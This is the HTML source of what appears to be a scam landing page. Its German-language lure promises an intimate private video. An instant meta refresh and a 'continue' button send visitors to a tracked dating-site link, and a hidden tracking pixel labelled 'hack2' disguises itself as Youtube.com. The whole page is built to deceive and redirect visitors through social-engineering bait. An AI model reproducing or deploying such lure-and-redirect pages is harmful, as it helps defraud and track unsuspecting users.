<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta property="og:title" content="Ich bin allein in meinem Haus, Liebling, komm und schau dir mein Video an, drücke auf Play ♥">
  <meta property="og:image" content="https://i.imgur.com/hYVeose.jpg">
  <meta name="robots" content="index">
  <meta name="robots" content="index">
  <meta name="robots" content="noindex">
  <meta name="robots" content="nofollow">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="REFRESH" content="0;URL=https://nicedate.life/?u=f738hw0&o=mt5k5gw">
</head>
<html lang="en">

<head>



  <meta property="og:title" content="Welcome, Live chat.ONLINE " />


  <meta property="og:image" content="https://i.imgur.com/mt7wbRF.png" />



  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title> Welcome, live chat. ONLINE </title>

  <link rel="stylesheet" href="template.css">
  <link href="https://fonts.googleapis.com/css2?family=Alata&family=Montserrat:ital,wght@0,100;0,300;1,500&display=swap"
    rel="stylesheet">

  <link rel="shortcut icon" type="image/png"
    href="https://icon-icons.com/icons2/1353/PNG/96/if-word-4-2875642_88216.png">


</head>



<body>


  <video src="https://redd.tube/d/dQDXfa0" autoplay muted playsinline loop poster="IMAGEN">

    <Source src="" type="video/mp4">

  </video>



  <div class="warning">

    <img src="https://i.imgur.com/VX3CUNu.png" alt="" class="imagen">

  </div>


  <div class="contenedor">

    <a href="https://nicedate.life/?u=f738hw0&o=mt5k5gw"> <img src="https://i.imgur.com/9jBSPyZ.png" alt="" class="continue">
    </a>

  </div>



</body>




<style>
  body {

    margin: 0;
    font-family: 'Alata', sans-serif;

  }

  video {

    position: fixed;

    min-width: 100%;
    min-height: 100%;

    top: 50%;
    left: 50%;

    transform: translateX(-50%) translateY(-50%);

    /* z-index: -1; */

  }


  .imagen {

    width: 50%;
    height: auto;

    position: fixed;
    top: 55%;
    left: 50%;
    transform: translate(-50%, -50%);
  }

  .continue {

    width: 50%;
    height: auto;

    position: fixed;
    top: 82%;
    left: 50%;
    transform: translate(-50%, -50%);
  }






  @media (min-width: 1081px) {


    .imagen {
      top: 35%;
      width: 55%;
    }


  }


  @media (min-height: 1280px) {

    .imagen {
      top: 60%;
      width: 80%;
    }

  }

  @media (max-width: 480px) {

    .imagen {
      top: 60%;
      width: 80%;
    }

  }


  @media (min-width: 2000px) {

    .imagen {
      top: 55%;
      width: 65%;
    }

  }

  @media (min-width: 1440px) {

    .imagen {
      top: 35%;
      width: 70%;
    }

  }


  @media (min-height: 1440px) {

    .imagen {
      top: 55%;
      width: 75%;
    }

  }


  @media (min-width: 1650px) {

    .imagen {
      top: 35%;
      width: 75%;
    }

  }


  .unsusbscribe {

    top: 95%;


  }
</style>



</html>
  <!-- End of bodyEnd -->
  
  <!-- Include the script -->
  
  <img src="//whos.amung.us/pingjs/?k=hack2&t= Ichigo♥ &x=Youtube.com" style="display:none" alt="">
  
  
  
  </body>
